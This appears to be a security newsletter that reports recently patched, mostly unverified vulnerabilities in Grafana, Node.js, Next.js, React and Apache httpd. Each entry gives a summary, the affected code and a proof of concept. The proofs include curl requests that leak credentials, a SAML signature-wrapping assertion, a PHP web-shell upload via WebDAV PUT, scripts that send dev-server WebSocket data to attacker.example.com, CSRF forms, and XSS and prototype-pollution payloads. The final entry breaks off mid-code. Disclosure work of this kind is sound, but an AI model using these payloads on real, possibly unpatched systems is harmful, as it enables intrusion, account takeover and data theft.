📰 Vulnerability Spoiler Alert


“Exposing patches before CVEs since 2025”

Saturday, March 21, 2026

📋 Today’s Briefing

Total Findings: 87
Confirmed: 11
Unverified: 69
False Positives: 7

CRITICAL: 2 · HIGH: 29 · MEDIUM: 46 · LOW: 3

🔥 HIGH UNVERIFIED Broken Access Control / Privilege Escalation

Mar 20, 2026, 11:02 PM — grafana/grafana

Commit: aa672a7

Author: Tito Lins

Before this patch, the GET /api/alertmanager/grafana/config/api/v1/alerts endpoint (which returns the raw Alertmanager configuration blob, potentially containing sensitive credentials like SMTP passwords, webhook secrets, and API tokens) was accessible to any user with the broad 'alert.notifications:read' permission, which was granted to Viewers and Editors. Similarly, GET /config/history and POST /config/history/{id}/_activate were accessible to users with alert.notifications:read/write. The patch restricts these endpoints to admin-only via new fine-grained RBAC actions (alert.notifications.config-history:read/write).


Affected Code

case http.MethodGet + "/api/alertmanager/grafana/config/api/v1/alerts":
    eval = ac.EvalPermission(ac.ActionAlertingNotificationsRead)
case http.MethodGet + "/api/alertmanager/grafana/config/history":
    eval = ac.EvalPermission(ac.ActionAlertingNotificationsRead)

Proof of Concept

As a non-admin Grafana user (Viewer or Editor role) with alert.notifications:read permission, send: GET /api/alertmanager/grafana/config/api/v1/alerts with a valid session cookie. Before the patch, this returns the full raw Alertmanager config including SMTP credentials, webhook URLs with secrets, and API keys. Example: curl -H 'Cookie: grafana_session=<viewer_session>' https://grafana.example.com/api/alertmanager/grafana/config/api/v1/alerts

⚠️ MEDIUM UNVERIFIED Integer Overflow / Division by Zero

Mar 20, 2026, 05:25 PM — nodejs/node

Commit: 7547e79

Author: Node.js GitHub Bot

The patch fixes ICU-23109 in nfrule.cpp where `util64_pow(rule1->radix, rule1->exponent)` could overflow to zero, causing a subsequent modulo-by-zero operation (`rule1->baseValue % util64_pow(rule1->radix, rule1->exponent)`). While there was already a comment about preventing `% 0`, the existing check `rule1->radix != 0` did not guard against the case where the power computation itself overflows to zero. The patch introduces a pre-computed `mod` variable with an explicit overflow check, returning an error status if `mod` is zero.


Affected Code

if ((rule1->baseValue > 0
    && (rule1->radix != 0) // ICU-23109 Ensure next line won't "% 0"
    && (rule1->baseValue % util64_pow(rule1->radix, rule1->exponent)) == 0)

Proof of Concept

Construct an ICU RuleBasedNumberFormat rule whose radix and exponent make util64_pow(radix, exponent) wrap around uint64_t to exactly 0. With radix=10 the computation overflows once exponent exceeds 19, and the wrapped result becomes exactly 0 once 2^64 divides radix^exponent (exponent >= 64 for radix 10). This triggers a modulo-by-zero in `rule1->baseValue % 0`, which is undefined behavior in C++ and can crash the process (SIGFPE or abort) when parsing or formatting numbers with such rules in Node.js via the Intl API.
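The wraparound to zero can be sketched by simulating 64-bit unsigned multiplication in Python (the helper below is an illustration of the arithmetic, not ICU's actual util64_pow):

```python
# Simulate util64_pow under uint64_t wraparound semantics.
MASK = (1 << 64) - 1

def util64_pow_sim(radix, exponent):
    result = 1
    for _ in range(exponent):
        result = (result * radix) & MASK  # multiplication wraps mod 2^64
    return result

print(util64_pow_sim(10, 19))  # 10^19 still fits in uint64_t: nonzero
print(util64_pow_sim(10, 64))  # 0 — 2^64 divides 10^64, so the modulus
                               # fed to `baseValue % mod` becomes zero
```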

💣 CRITICAL UNVERIFIED XML Signature Wrapping / Authentication Bypass

Mar 20, 2026, 09:36 AM — grafana/grafana

Commit: fa9639f

Author: Matheus Macabu

GHSA-479m-364c-43vc describes a vulnerability in github.com/russellhaering/goxmldsig (used for SAML XML digital signature validation) where an attacker could bypass XML signature verification. The library also depends on github.com/beevik/etree for XML parsing, and the combination of versions before this fix allowed signature wrapping attacks where a malicious SAML response could include a valid signature over one element while the actual authenticated data came from a different, attacker-controlled element. This allowed authentication bypass in Grafana's SAML SSO implementation.


Affected Code

github.com/russellhaering/goxmldsig v1.4.0
github.com/beevik/etree v1.4.1

Proof of Concept

Craft a malicious SAML Response with XML Signature Wrapping:
1. Obtain a valid signed SAML assertion (or intercept one)
2. Wrap it in a crafted XML structure:
<samlp:Response>
  <Signature xmlns="..."><!-- valid signature over benign Assertion --></Signature>
  <saml:Assertion><!-- attacker-controlled assertion with admin privileges -->
    <saml:Subject><saml:NameID>admin@example.com</saml:NameID></saml:Subject>
    <saml:AttributeStatement>
      <saml:Attribute Name="role"><saml:AttributeValue>Admin</saml:AttributeValue></saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>
3. The vulnerable goxmldsig v1.4.0 would verify the signature over the benign element but the application would process the attacker's assertion, granting admin access without valid credentials.

⚠️ MEDIUM UNVERIFIED Open Redirect

Mar 19, 2026, 11:44 AM — grafana/grafana

Commit: c62113e

Author: Ezequiel Victorero

The Grafana short URL feature allowed authenticated users to create short URLs with arbitrary target paths, including external URLs like `http://evil.com` or protocol-relative URLs like `//evil.com`. When a victim clicked a Grafana short URL, they would be silently redirected to the attacker-controlled external domain. The patch adds validation at both creation time and redirect time to ensure paths are always relative and cannot contain schemes, protocol-relative prefixes, or other external URL patterns.


Affected Code

// No validation of the path before storing or redirecting
shortURL, err := hs.ShortURLService.CreateShortURL(c.Req.Context(), c.SignedInUser, cmd)
// ...
c.Redirect(setting.ToAbsUrl(shortURL.Path), http.StatusFound)

Proof of Concept

1. Authenticate to Grafana as any signed-in user
2. POST /api/short-urls with body: {"path": "//evil.com/phishing-page"}
3. Receive response with a short URL like: https://grafana.example.com/goto/AbCdEfGh
4. Send this short URL to a victim - when clicked, browser follows redirect to //evil.com/phishing-page (interpreted as https://evil.com/phishing-page)

Alternatively: POST /api/short-urls with body: {"path": "http://evil.com"} to redirect to an explicit external URL.
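The protocol-relative trick can be reproduced with Python's urllib, which resolves `//host` targets the same way browsers do; the validation sketch that follows is illustrative, not Grafana's actual check:

```python
from urllib.parse import urljoin

# A redirect target beginning with '//' keeps the current scheme but
# replaces the host, escaping the Grafana origin entirely.
base = 'https://grafana.example.com/goto/AbCdEfGh'
print(urljoin(base, '//evil.com/phishing-page'))
# -> https://evil.com/phishing-page

def is_safe_path(path):
    # Illustrative check: relative to origin, not protocol-relative,
    # and no scheme separator anywhere in the value.
    return path.startswith('/') and not path.startswith('//') and ':' not in path

print(is_safe_path('//evil.com/phishing-page'))  # False
print(is_safe_path('/d/abc123/my-dashboard'))    # True
```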

🔥 HIGH UNVERIFIED Denial of Service / HTTP/2 Protocol Vulnerability

Mar 19, 2026, 10:22 AM — grafana/grafana

Commit: 5a117a2

Author: Hugo Häggmark

This commit patches CVE-2026-33186 in the google.golang.org/grpc library by upgrading from v1.79.1 to v1.79.3. The vulnerability exists in the gRPC-Go HTTP/2 implementation and can be exploited to cause a denial of service condition. The patch updates the dependency across multiple Go modules in the Grafana repository to remediate the vulnerability.


Affected Code

google.golang.org/grpc v1.79.1

Proof of Concept

A malicious client connecting to any gRPC endpoint could send specially crafted HTTP/2 frames to exploit the vulnerability in grpc-go v1.79.1, causing the server to crash or become unresponsive. For example: using a gRPC client to send malformed/crafted HTTP/2 HEADERS or DATA frames to a Grafana gRPC service endpoint, triggering the DoS condition in the affected grpc-go HTTP/2 handler code.

🔥 HIGH UNVERIFIED Improper Access Control / Authentication Bypass

Mar 18, 2026, 08:46 PM — apache/httpd

Commit: e8b5fdc

Author: Rich Bowen

The original example configuration had 'Require all granted' at the Directory level, which grants unauthenticated access to all users by default. The LimitExcept block only required authentication for non-GET/POST/OPTIONS methods, but the outer 'Require all granted' could override authentication requirements depending on configuration context. The patch removes 'Require all granted' and replaces the LimitExcept approach with a RequireAny block that properly requires either the correct HTTP method OR an authenticated admin user, ensuring write operations require authentication.


Affected Code

<Directory "/usr/local/apache2/htdocs/foo">
    Require all granted
    Dav On
    ...
    <LimitExcept GET POST OPTIONS>
        Require user admin
    </LimitExcept>

Proof of Concept

With the old config, an unauthenticated user could perform WebDAV write operations: `curl -X PUT http://example.com/foo/malicious.php -d '<?php system($_GET["cmd"]); ?>'` - The 'Require all granted' directive grants access to all users, and depending on Apache's authorization merging behavior, could allow unauthenticated PUT/DELETE/MKCOL requests to modify server files, potentially leading to remote code execution.
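Based on the commit description, the fixed configuration plausibly looks like the following sketch, using mod_authz_core's RequireAny container so that read-only methods pass but every write method requires the admin user:

```apacheconf
<Directory "/usr/local/apache2/htdocs/foo">
    Dav On
    <RequireAny>
        # Safe methods are open; any other method falls through to auth
        Require method GET POST OPTIONS
        Require user admin
    </RequireAny>
</Directory>
```

Because RequireAny grants access if either condition matches, a PUT or MKCOL request can only succeed as the authenticated admin user.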

⚠️ MEDIUM UNVERIFIED Authorization Bypass / Privilege Escalation

Mar 18, 2026, 11:18 AM — grafana/grafana

Commit: d46801e

Author: Roberto Jiménez Sánchez

Before the patch, a resource manager could be changed directly from one manager to another (e.g., from repo:abc to terraform:xyz) in a single update operation without going through a remove-then-add workflow. This allowed one management system (e.g., Terraform) to silently take over resources managed by another system (e.g., a Git repository), potentially leading to unauthorized control over managed resources and unpredictable reconciliation conflicts. The patch adds an explicit check that blocks any update where both old and new objects have a manager set but with different values, returning HTTP 403.


Affected Code

managerNew, okNew := obj.GetManagerProperties()
managerOld, okOld := old.GetManagerProperties()
if managerNew == managerOld || (okNew && !okOld) { // added manager is OK
    return nil
}

Proof of Concept

// A resource managed by repo:abc can be hijacked by terraform:xyz in one step:
// 1. GET /apis/dashboard.grafana.app/v1beta1/namespaces/default/dashboards/dashboard-uid
// 2. Modify annotations and PUT/UPDATE:
// annotations["grafana.app/manager-kind"] = "terraform"
// annotations["grafana.app/manager-identity"] = "attacker-terraform-workspace"
// PUT /apis/dashboard.grafana.app/v1beta1/namespaces/default/dashboards/dashboard-uid
// Before patch: returns 200 OK, resource is now managed by terraform instead of repo
// After patch: returns 403 Forbidden with message 'Cannot change resource manager; remove the existing manager first, then add the new one'
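The admission logic in the snippet above can be mirrored in a short Python sketch (function name and None-for-unmanaged convention are illustrative):

```python
def manager_change_allowed(old_manager, new_manager):
    # Mirrors the Go check: identical managers pass, and adding a
    # manager to a previously unmanaged object passes; switching from
    # one manager to another in a single update is rejected (HTTP 403).
    if new_manager == old_manager:
        return True
    if new_manager is not None and old_manager is None:
        return True  # newly added manager is OK
    return False

print(manager_change_allowed(None, 'terraform:xyz'))        # True
print(manager_change_allowed('repo:abc', 'terraform:xyz'))  # False
```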

⚠️ MEDIUM UNVERIFIED Broken Access Control

Mar 17, 2026, 11:28 PM — grafana/grafana

Commit: 1c12cf1

Author: Stephanie Hingtgen

Before this patch, the Grafana Live push endpoint (`/api/live/push/:streamId`) had no RBAC authorization check, allowing any authenticated user (including Viewers) to push metrics and events to Grafana Live streams. The patch adds an `authorize(ac.EvalPermission(ac.ActionLivePush))` middleware that restricts this endpoint to users with the `live:push` permission (granted to Editors and Admins by default).


Affected Code

liveRoute.Post("/push/:streamId", hs.LivePushGateway.Handle)

Proof of Concept

As a Viewer-role user with valid session credentials, send: POST /api/live/push/anystream with body `cpu usage=0.5` and a valid session cookie or API key. Before the patch, this would return HTTP 200 and successfully push data to the stream. After the patch, it returns HTTP 403.

⚠️ MEDIUM UNVERIFIED Cross-Origin Request Forgery / Unauthorized Access to Dev Resources

Mar 17, 2026, 11:02 PM — vercel/next.js

Commit: b2b802c

Author: Zack Tanner

Before this patch, Next.js development servers only warned (but did not block) cross-origin requests to internal dev assets and endpoints (/_next/*, /__nextjs*) when `allowedDevOrigins` was not configured. An attacker could craft a malicious webpage that loads or interacts with internal dev-only resources (HMR WebSocket, error feedback endpoints, internal chunks) from any origin. The patch changes the default behavior from warn-only to blocking with a 403 response, preventing unauthorized cross-origin access to dev server internals.


Affected Code

const mode = typeof allowedDevOrigins === 'undefined' ? 'warn' : 'block'
// ...
return warnOrBlockRequest(res, refererHostname, mode)
// ...
warnOrBlockRequest(res, originLowerCase, mode)

Proof of Concept

# Attacker hosts a page at https://attacker.example.com/exploit.html
# Developer is running Next.js dev server at http://localhost:3000

# The following page silently exfiltrates Next.js internal dev chunks or
# makes requests to internal endpoints without being blocked:

<html>
<body>
<script>
  // Before patch: this request succeeds with 200 (only a warning in CLI)
  fetch('http://localhost:3000/_next/static/chunks/pages/_app.js', {
    mode: 'no-cors',
    headers: { 'Sec-Fetch-Mode': 'no-cors', 'Sec-Fetch-Site': 'cross-site' }
  });

  // Or connect to HMR WebSocket to observe file changes
  const ws = new WebSocket('ws://localhost:3000/_next/webpack-hmr');
  ws.onmessage = (e) => { fetch('https://attacker.example.com/collect?d='+e.data); };
</script>
</body>
</html>

🔥 HIGH UNVERIFIED Authentication Bypass

Mar 17, 2026, 06:36 PM — grafana/grafana

Commit: 4eb83a7

Author: MdTanwer

The MSSQL connection string was built by directly concatenating the username and password without escaping special characters. Since semicolons are used as key-value delimiters in the connection string, a password containing a semicolon would be truncated at the semicolon, allowing authentication bypass or connection to unintended databases. For example, a password like `StrongPass;database=other` would cause the driver to parse `database=other` as a separate connection string parameter.


Affected Code

connStr += fmt.Sprintf("user id=%s;password=%s;", dsInfo.User, dsInfo.DecryptedSecureJSONData["password"])

Proof of Concept

Set password to: `wrongpass;user id=sa` — the resulting connection string becomes `server=localhost;database=mydb;user id=user;password=wrongpass;user id=sa;` which causes go-mssqldb to use `sa` as the user id (last value wins in many parsers), potentially authenticating as a different user than intended. Alternatively, password=`x;database=master` redirects the connection to the master database regardless of configured database.
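The last-value-wins behavior can be demonstrated with a naive semicolon-delimited parser (a simplification of how ADO-style connection strings are parsed, not go-mssqldb's actual code):

```python
def parse_conn_str(s):
    # Split on ';' into key=value pairs; a repeated key overwrites the
    # earlier value, which is exactly what the injection exploits.
    params = {}
    for part in s.split(';'):
        if '=' in part:
            key, value = part.split('=', 1)
            params[key.strip().lower()] = value
    return params

password = 'wrongpass;user id=sa'  # attacker-controlled value
conn = f'server=localhost;database=mydb;user id=user;password={password};'
print(parse_conn_str(conn)['user id'])  # sa — injected key wins
```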

🔥 HIGH UNVERIFIED Authorization Bypass / Privilege Escalation

Mar 17, 2026, 03:06 PM — grafana/grafana

Commit: 3293279

Author: Yuri Tseretyan

The provisioning API's `UpdateContactPoint` endpoint did not perform authorization checks for protected fields (e.g., webhook URLs, API keys) before the patch. Any user with access to the provisioning API could modify protected/sensitive fields in contact points without the required `receivers:update.protected` permission, bypassing the security controls enforced by the regular receiver API. The patch adds a `checkProtectedFields` method that verifies the user has appropriate permissions before allowing modifications to protected fields.


Affected Code

func (ecp *ContactPointService) UpdateContactPoint(ctx context.Context, orgID int64, contactPoint apimodels.EmbeddedContactPoint, provenance models.Provenance) error {

Proof of Concept

A user with provisioning API access but without `receivers:update.protected` permission could send:

PUT /api/v1/provisioning/contact-points/{uid}
Content-Type: application/json
X-Disable-Provenance: true

{"uid":"existing-uid","name":"My Slack","type":"slack","settings":{"url":"https://attacker.com/steal-alerts"},"disableResolveMessage":false}

This would overwrite the protected webhook URL field without the `receivers:update.protected` permission check, allowing an attacker to redirect alert notifications to an attacker-controlled endpoint or exfiltrate alert data.
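A hypothetical sketch of the added guard (the protected field names below are assumptions for illustration; only the `receivers:update.protected` permission string comes from the commit description):

```python
PROTECTED_FIELDS = ('url', 'apiKey')  # illustrative protected settings

def check_protected_fields(old_settings, new_settings, user_permissions):
    # Modifying any protected field requires the
    # receivers:update.protected permission; other edits pass through.
    for field in PROTECTED_FIELDS:
        if old_settings.get(field) != new_settings.get(field) \
                and 'receivers:update.protected' not in user_permissions:
            return False
    return True

print(check_protected_fields(
    {'url': 'https://hooks.slack.com/services/T000/B000'},
    {'url': 'https://attacker.com/steal-alerts'},
    set()))  # False — update rejected without the permission
```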

💡 LOW UNVERIFIED Input Validation Bypass / Size Guard Bypass

Mar 17, 2026, 10:50 AM — facebook/react

Commit: 12ba7d8

Author: Sebastian "Sebbie" Silbermann

The `$B` (Blob) case in `parseModelString` did not validate that the FormData entry was actually a Blob before returning it. Since `FormData.get()` can return either a string or a Blob/File, an attacker could craft a malformed Server Action payload that stores a large string under a key and references it via `$B`, bypassing the `bumpArrayCount` size guard that applies to regular string values. The patch adds an `instanceof Blob` check that throws an error if the backing entry is not a real Blob, closing this bypass. While the PR notes this doesn't produce meaningful amplification on its own, it is a defense-in-depth fix against potential combined attacks.


Affected Code

const backingEntry: Blob = (response._formData.get(blobKey): any);
return backingEntry;

Proof of Concept

const formData = new FormData();
formData.set('1', '-'.repeat(50000)); // large string, not a Blob
formData.set('0', JSON.stringify(['$B1'])); // reference it as a Blob
await ReactServerDOMServer.decodeReply(formData, webpackServerMap);
// Before patch: returns the large string bypassing blob size guards
// After patch: throws 'Referenced Blob is not a Blob.'

🔥 HIGH UNVERIFIED Open Redirect / Server-Side Request Forgery (SSRF)

Mar 17, 2026, 01:41 AM — vercel/next.js

Commit: 00bdb03

Author: Zack Tanner

The commit patches the compiled `http-proxy` / `follow-redirects` library bundled in Next.js, referencing security advisory GHSA-ggv3-7p47-pfv8. The vulnerability involves improper handling of HTTP redirects in the `follow-redirects` library, which could allow an attacker to manipulate redirect targets to leak sensitive request headers (such as Authorization) to unintended hosts or bypass security controls via crafted redirect responses. The patch updates the compiled bundle with fixes to the redirect handling logic.


Affected Code

var r=e.headers.location;if(r&&this._options.followRedirects!==false&&t>=300&&t<400){this._currentRequest.removeAllListeners();this._currentRequest.on("error",noop);this._currentRequest.abort();e.destroy();if(++this._redirectCount>this._options.maxRedirects){this.emit("error",new Error("Max redirects exceeded."));return}

Proof of Concept

An attacker controls a server that returns a 301 redirect response pointing to an attacker-controlled host. When a Next.js application proxies a request with an Authorization header to the attacker's initial URL, the follow-redirects library follows the redirect and forwards the Authorization header to the attacker's second host:

1. Victim Next.js app makes request: GET https://attacker.com/step1 with 'Authorization: Bearer secret-token'
2. attacker.com/step1 responds: HTTP/1.1 301 Moved Permanently\r\nLocation: https://evil.com/collect\r\n
3. The vulnerable follow-redirects code follows the redirect and sends GET https://evil.com/collect with 'Authorization: Bearer secret-token'
4. Attacker's evil.com receives the sensitive token

This is exploitable when Next.js rewrites/proxies user-controlled or partially-controlled URLs with sensitive headers attached.
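The mitigation shipped in patched follow-redirects releases (dropping credential-bearing headers on cross-host redirects) can be sketched in Python; the function below is an illustration of that behavior, not the library's code:

```python
from urllib.parse import urlsplit

SENSITIVE = ('authorization', 'cookie', 'proxy-authorization')

def headers_for_redirect(headers, old_url, new_url):
    # Drop credential-bearing headers when the redirect target is on a
    # different host than the original request.
    if urlsplit(old_url).hostname != urlsplit(new_url).hostname:
        return {k: v for k, v in headers.items()
                if k.lower() not in SENSITIVE}
    return dict(headers)

h = {'Authorization': 'Bearer secret-token'}
print(headers_for_redirect(h, 'https://attacker.com/step1',
                           'https://evil.com/collect'))  # {} — token stripped
```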

🔥 HIGH UNVERIFIED Cross-Site Request Forgery (CSRF)

Mar 17, 2026, 01:57 AM — vercel/next.js

Commit: a27a11d

Author: Zack Tanner

Before the patch, when the `Origin` header was set to the string `'null'` (which browsers send from privacy-sensitive contexts like sandboxed iframes), Next.js would skip the CSRF origin check entirely because the code treated `'null'` as a missing/invalid origin and fell through without validation. This allowed an attacker to embed a sandboxed iframe that submits a Server Action cross-origin with user credentials (cookies) attached, bypassing CSRF protection. The patch now treats `'null'` as a valid but opaque origin and checks it against the `allowedOrigins` allowlist, blocking unauthorized cross-origin Server Action submissions from sandboxed contexts.


Affected Code

const originDomain =
    typeof originHeader === 'string' && originHeader !== 'null'
      ? new URL(originHeader).host
      : undefined

Proof of Concept

Attacker hosts malicious page at https://evil.com with:
<iframe sandbox="allow-forms" src="https://evil.com/attack.html"></iframe>

attack.html contains:
<form method="POST" action="https://victim.com/sensitive-page">
  <input name="$ACTION_ID_abc123" value="" />
  <input type="submit" />
</form>
<script>document.forms[0].submit()</script>

Browser sends: Origin: null (opaque origin from sandboxed iframe)
Before patch: originDomain = undefined, CSRF check is skipped with only a warning, action executes with victim's cookies.
After patch: originHost = 'null', checked against allowedOrigins; since 'null' is not in allowedOrigins, request is rejected with 403/500.
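The before/after behavior can be condensed into a small Python sketch of the patched check ('null' is kept as an opaque origin value and matched against the allowlist rather than skipped; host parsing here is simplified):

```python
def csrf_origin_allowed(origin_header, allowed_origins, site_host):
    # Patched-behavior sketch: a 'null' Origin is a real, opaque origin
    # that must be explicitly allowlisted, never a reason to skip checks.
    if origin_header is None:
        return True  # no Origin header, e.g. same-origin navigation
    if origin_header == 'null':
        origin_host = 'null'
    else:
        origin_host = origin_header.split('://', 1)[-1].split('/', 1)[0]
    return origin_host == site_host or origin_host in allowed_origins

print(csrf_origin_allowed('null', set(), 'victim.com'))                # False
print(csrf_origin_allowed('https://victim.com', set(), 'victim.com'))  # True
```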

🔥 HIGH UNVERIFIED Cross-Site WebSocket Hijacking / CSRF

Mar 17, 2026, 12:42 AM — vercel/next.js

Commit: 862f9b9

Author: Zack Tanner

Before the patch, WebSocket connections to Next.js dev server endpoints (e.g., /_next/webpack-hmr) were accepted from privacy-sensitive origins (e.g., pages served with 'sandbox' CSP that sets origin to null). The old code only blocked requests when rawOrigin was truthy AND not equal to 'null', meaning requests with origin header 'null' (sent by sandboxed iframes/pages) bypassed origin validation entirely. The patch fixes this by treating a 'null' origin as a defined but non-allowed origin, causing such requests to be blocked.


Affected Code

if (rawOrigin && rawOrigin !== 'null') {
    const parsedOrigin = parseUrl(rawOrigin)
    if (parsedOrigin) {
      const originLowerCase = parsedOrigin.hostname.toLowerCase()
      if (!isCsrfOriginAllowed(originLowerCase, allowedOrigins)) {
        return warnOrBlockRequest(res, originLowerCase, mode)
      }
    }
  }
  return false

Proof of Concept

1. Attacker hosts a page at http://attacker.com/ with Content-Security-Policy: sandbox allow-scripts (causing browser to send Origin: null for requests)
2. Page contains: <script>const ws = new WebSocket('http://localhost:3000/_next/webpack-hmr'); ws.onmessage = (e) => { fetch('https://attacker.com/collect?d='+encodeURIComponent(e.data)) }</script>
3. Victim (developer) visits http://attacker.com/ while running Next.js dev server
4. Browser sends WebSocket upgrade with Origin: null header
5. Old code skips validation (rawOrigin === 'null' condition exits early), connection is accepted
6. Attacker can receive HMR messages, potentially revealing source code structure or injecting malicious HMR updates

🔥 HIGH UNVERIFIED Missing Authorization / Broken Access Control

Mar 16, 2026, 11:31 PM — grafana/grafana

Commit: 5c89af6

Author: Ezequiel Victorero

Before this patch, the Kubernetes API endpoints for dashboard snapshots (GET, LIST, DELETE, POST /create, DELETE /delete/{deleteKey}, GET /settings) used a default `ServiceAuthorizer` that did not enforce RBAC permissions for snapshot resources. Any authenticated user, regardless of their assigned permissions, could read, list, create, and delete snapshots. The patch adds a `SnapshotAuthorizer` that maps K8s verbs to Grafana RBAC actions (`snapshots:read`, `snapshots:create`, `snapshots:delete`) and applies RBAC checks to the custom HTTP routes as well.


Affected Code

func (b *DashboardsAPIBuilder) GetAuthorizer() authorizer.Authorizer {
	return grafanaauthorizer.NewServiceAuthorizer()
}

Proof of Concept

A user with no snapshot permissions (e.g., Org role 'None') can access snapshot data:

GET /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots
  -> Returns 200 OK with snapshot list (should be 403 Forbidden)

DELETE /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots/{snapshotKey}
  -> Returns 200 OK (should be 403 Forbidden)

POST /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots/create
  Body: {"dashboard":{"uid":"existing-uid","title":"test"},"name":"stolen"}
  -> Returns 200 OK creating a snapshot (should be 403 Forbidden)
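The verb-to-action mapping described for the SnapshotAuthorizer can be sketched as follows (the dictionary is hypothetical; only the three RBAC action names come from the commit description):

```python
# Hypothetical mapping of Kubernetes verbs to Grafana RBAC actions.
VERB_TO_ACTION = {
    'get': 'snapshots:read',
    'list': 'snapshots:read',
    'create': 'snapshots:create',
    'delete': 'snapshots:delete',
}

def authorize(verb, user_actions):
    # Unknown verbs are denied; known verbs require the mapped action.
    required = VERB_TO_ACTION.get(verb)
    return required is not None and required in user_actions

print(authorize('list', {'snapshots:read'}))    # True
print(authorize('delete', {'snapshots:read'}))  # False — 403
```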

🔥 HIGH UNVERIFIED Broken Access Control / Insecure Direct Object Reference

Mar 16, 2026, 07:55 PM — grafana/grafana

Commit: f62299e

Author: Michael Mandrus

Public dashboard CRUD endpoints (Delete, Update, ExistsEnabledByDashboardUid) were only checking the user's role/permissions but not validating that the public dashboard being operated on belonged to the same organization as the requesting user. This allowed an authenticated user with Editor+ permissions in Org B to delete, update, or check the existence of public dashboards belonging to Org A, without having access to the source dashboard. The patch adds org_id checks to all relevant database queries to enforce org isolation.


Affected Code

func (d *PublicDashboardStoreImpl) Delete(ctx context.Context, uid string) (int64, error) {
	dashboard := &PublicDashboard{Uid: uid}
	var affectedRows int64
	err := d.sqlStore.WithDbSession(ctx, func(sess *db.Session) error {
		var err error
		affectedRows, err = sess.Delete(dashboard)

Proof of Concept

# Attacker is admin in OrgB (orgId=2), wants to delete a public dashboard in OrgA (orgId=1)
# They know the dashboardUid and public dashboard uid from prior reconnaissance
curl -X DELETE http://orgb_admin:password@localhost:3000/api/dashboards/uid/orgA_dashboard_uid/public-dashboards/orgA_pubdash_uid
# Before patch: deletion succeeds because only RBAC role is checked, not org ownership
# The Delete service call was: api.PublicDashboardService.Delete(c.Req.Context(), uid, dashboardUid)
# without passing c.GetOrgID(), so the store deleted any public dashboard matching uid regardless of org
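The effect of adding org_id to the store queries can be demonstrated with an in-memory SQLite sketch (table and column names are illustrative, not Grafana's actual schema):

```python
import sqlite3

# Illustrative schema: the real fix adds org_id to the store's queries.
db = sqlite3.connect(':memory:')
db.execute('CREATE TABLE dashboard_public (uid TEXT, org_id INTEGER)')
db.execute("INSERT INTO dashboard_public VALUES ('orgA_pubdash_uid', 1)")

def delete_public_dashboard(org_id, uid):
    # Scoping by org_id means an OrgB admin (org_id=2) cannot delete
    # OrgA's public dashboard even when they know its uid.
    cur = db.execute(
        'DELETE FROM dashboard_public WHERE uid = ? AND org_id = ?',
        (uid, org_id))
    return cur.rowcount

print(delete_public_dashboard(2, 'orgA_pubdash_uid'))  # 0 — cross-org blocked
print(delete_public_dashboard(1, 'orgA_pubdash_uid'))  # 1 — owning org succeeds
```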

🔥 HIGH UNVERIFIED XSS / Prototype Pollution

Mar 6, 2026, 08:24 AM — grafana/grafana

Commit: cf7d85c

Author: dependabot[bot]

DOMPurify 3.3.1 contained multiple security vulnerabilities: a bypass via jsdom's faulty raw-text tag parsing that could allow XSS payloads to pass through sanitization, a prototype pollution issue when working with custom elements, and a lenient config parsing issue in `_isValidAttribute`. These vulnerabilities could allow attackers to inject malicious HTML/JavaScript that bypasses DOMPurify's sanitization, leading to XSS attacks in Grafana's frontend which uses DOMPurify to sanitize user-supplied content.


Affected Code

"dompurify": "3.3.1"

Proof of Concept

// Prototype pollution via custom elements in DOMPurify 3.3.1:
// An attacker could craft input like:
const payload = '<custom-element constructor="polluted"></custom-element>';
DOMPurify.sanitize(payload); // Could pollute Object.prototype

// XSS bypass via jsdom raw-text tag parsing:
const xssPayload = '<script type="text/plain"></script><img src=x onerror=alert(document.cookie)>';
// In jsdom environments, DOMPurify 3.3.1 might fail to sanitize this correctly,
// allowing the onerror handler to execute when rendered in a browser

⚠️ MEDIUM UNVERIFIED Regular Expression Denial of Service (ReDoS)

Mar 6, 2026, 08:34 AM — grafana/grafana

Commit: 333964d

Author: Jack Westbrook

The minimatch package prior to version 3.1.2 (and related versions) contained a ReDoS vulnerability (CVE-2022-3517) where specially crafted patterns could cause catastrophic backtracking in the regular expression engine. This patch upgrades minimatch from vulnerable versions (3.0.5, 9.0.3, 5.0.1, 7.4.6) to patched versions (3.1.4, 10.2.4, 5.1.9, 7.4.9) that fix the ReDoS issue. The vulnerability could allow an attacker to cause denial of service by providing a malicious glob pattern.


Affected Code

minimatch: "npm:3.0.5"  // in @lerna/create and lerna dependencies
minimatch: "npm:9.0.3"  // in @nx/devkit
minimatch: "npm:5.0.1"  // version ^5.0.1
minimatch: "npm:7.4.6"  // version ^7.4.3

Proof of Concept

const minimatch = require('minimatch'); // vulnerable release, e.g. 3.0.5
// CVE-2022-3517: ReDoS with crafted input
// The following pattern causes catastrophic backtracking:
const start = Date.now();
minimatch('a' + 'a'.repeat(25) + '!', '{' + 'a,'.repeat(25) + 'b}');
console.log('Time:', Date.now() - start, 'ms'); // Takes exponentially long time, causing DoS

🔥 HIGH UNVERIFIED Prototype Pollution

Mar 6, 2026, 08:12 AM — grafana/grafana

Commit: d0a5b71

Author: dependabot[bot]

The immutable library versions prior to 5.1.5 contained a Prototype Pollution vulnerability (Improperly Controlled Modification of Object Prototype Attributes). This allowed attackers to manipulate JavaScript object prototypes through specially crafted keys like '__proto__', 'constructor', or 'prototype', potentially affecting all objects in the application. The patch upgrades immutable from 5.1.4 to 5.1.5 which fixes this vulnerability.


Affected Code

"immutable": "5.1.4"

Proof of Concept

const { fromJS } = require('immutable'); // vulnerable 5.1.4 release
const malicious = fromJS(JSON.parse('{"__proto__": {"polluted": true}}'));
console.log(({}).polluted); // true - prototype has been polluted
// This allows attackers to inject properties into Object.prototype,
// affecting all subsequent object property lookups in the application

🔥 HIGH UNVERIFIED Use-After-Free / Memory Corruption

Mar 6, 2026, 06:01 AM — nodejs/node

Commit: a06e789

Author: Gerhard Stöbich

When pipelined HTTP requests arrive in a single TCP segment, llhttp_execute() processes all of them in one call. If a synchronous 'close' event handler calls freeParser() mid-execution, cleanParser() nulls out parser state while llhttp_execute() is still on the call stack, causing use-after-free/null-pointer dereference crashes on subsequent callbacks. The patch adds an is_being_freed_ flag that causes the Proxy::Raw callback to return early (HPE_USER) when set, aborting llhttp_execute() before it accesses freed/nulled parser state.


Affected Code

if (parser->connectionsList_ != nullptr) {
  parser->connectionsList_->Pop(parser);
  parser->connectionsList_->PopActive(parser);
}

Proof of Concept

const { createServer } = require('http');
const { connect } = require('net');
const server = createServer((req, res) => {
